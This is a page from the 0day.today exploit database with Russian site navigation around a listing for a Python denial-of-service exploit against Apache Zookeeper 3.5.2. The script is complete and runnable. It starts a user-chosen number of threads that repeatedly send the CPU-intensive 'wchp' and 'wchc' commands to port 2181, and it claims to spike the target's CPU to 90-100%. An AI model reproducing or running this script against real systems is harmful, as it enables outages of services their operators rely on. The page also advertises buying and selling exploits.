0day.today - наибольшая база данных эксплоитов в мире.
![](/img/logo_green.jpg)
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Прочитайте [ соглашение ]
- Прочитайте [ Отправить ] правила
- Посетите страницу [ faq ] page
- [ Зарегистрируйте ] профиль
- Получите [ Gold ]
- Если Вы хотите [ продать ]
- Если Вы хотите [ купить ]
- Если Вы потеряли [ Счет ]
- Любые вопросы [ [email protected] ]
- Страница авторизации
- Страница регистрации
- Страница восстановления
- Страница FAQ
- Страница контактов
- Правила публикации
- Страница с соглашением
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Вы можете связаться с нами по:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zookeeper 3.5.2 - Denial of Service Exploit
Автор
Риск
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Категория
Дата добавления
Платформа
#!/usr/bin/python # Exploit Title: Zookeeper Client Denial Of Service (Port 2181) # Date: 2/7/2017 # Exploit Author: Brandon Dennis # Email: [email protected] # Software Link: http://zookeeper.apache.org/releases.html#download # Zookeeper Version: 3.5.2 # Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86 # Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. # This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. # The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper. # This should effect Linux x86 & x64 as well import time import os import threading import sys import socket numOfThreads = 1 exitStr = "n" stop_threads = False threads = [] ipAddress = "192.168.1.5" #Change this port = 2181 def sendCommand(ipAddress, port): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ipAddress, port)) s.send("wchp\r".encode("utf-8")) s.recv(1024) s.send("wchc\r".encode("utf-8")) s.close() except: pass def runCMD(id, stop, ipAddress, port): while True: sendCommand(ipAddress, port) if stop(): break return def welcomeBanner(): banner = """ _______ __ _____ _ |___ | | / / / __ \ | | / /| |/ / | / \/_ __ __ _ ___| |__ ___ _ __ / / | \ | | | '__/ _` / __| '_ \ / _ | '__| ./ /__| |\ \ | \__/| | | (_| \__ | | | | __| | \_____\_| \_/ \____|_| \__,_|___|_| |_|\___|_| By: Brandon Dennis Email: [email protected] """ print(banner) welcomeBanner() numOfThreads = int(input("How many threads do you want to use: ")) print ("Startin Up Threads...") for i in range(numOfThreads): t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port)) threads.append(t) t.start() print("Threads are now started...") while exitStr != "y": inpt = input("Do you wish to stop threads(y): ") if inpt == "y": exitStr = "y" print("\nStopping Threads...") stop_threads = True for thread in threads: thread.join() print("Threads are now stopped...") sys.exit(0); # 0day.today [2024-07-16] #